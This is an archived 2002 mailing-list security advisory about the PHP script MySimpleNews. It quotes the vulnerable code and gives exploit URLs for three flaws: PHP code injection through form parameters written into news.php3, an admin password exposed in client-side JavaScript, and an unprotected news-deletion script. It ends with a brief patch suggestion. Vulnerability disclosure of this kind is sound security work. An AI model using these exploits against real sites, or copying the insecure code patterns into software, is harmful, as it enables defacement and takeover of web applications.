|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Frog Man (leseulfrog_at_hotmail.com)
Date: Wed Oct 02 2002 - 15:17:53 CDT
Informations :
°°°°°°°°°°°°°°
Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.
a) Writing PHP code in a PHP file and execution of this code.
Problem :
°°°°°°°°°
----------------- users.php -----------------
<?
$fp=fopen("news.php3","a");
fwrite($fp,"Posté Par [$LOGIN]\n");
fwrite($fp,"Le $DATA\n<br>");
fwrite($fp,"$MESS\n<hr>");
fclose($fp);
?>
----------------- users.php -----------------
Exploit :
°°°°°°°°°
http://[target]/users.php?LOGIN=[PHP code]
or
http://[target]/users.php?DATA=[PHP code]
or
http://[target]/users.php?MESS=[PHP code]
Execution : http://[target]/news.php3
b) Recovery of admin's password.
Problem :
°°°°°°°°°
------------------ admin.html ------------------
moncode = prompt('MySimpleNews - Administration','');
if (moncode != "[PASSWORD]")
{
location.href="about:Erreur 403";
}
------------------ admin.html ------------------
Exploit :
°°°°°°°°°
view-source:http://[target]/admin.html
c) Deleting news.
Problem :
°°°°°°°°°
No security in the file.
Exploit :
°°°°°°°°°
http://[target]/vider.php3
Patch :
°°°°°°°
Use of htaccess.
More details in french :
http://www.frog-man.org/tutos/MySimpleNews.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m
n
_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]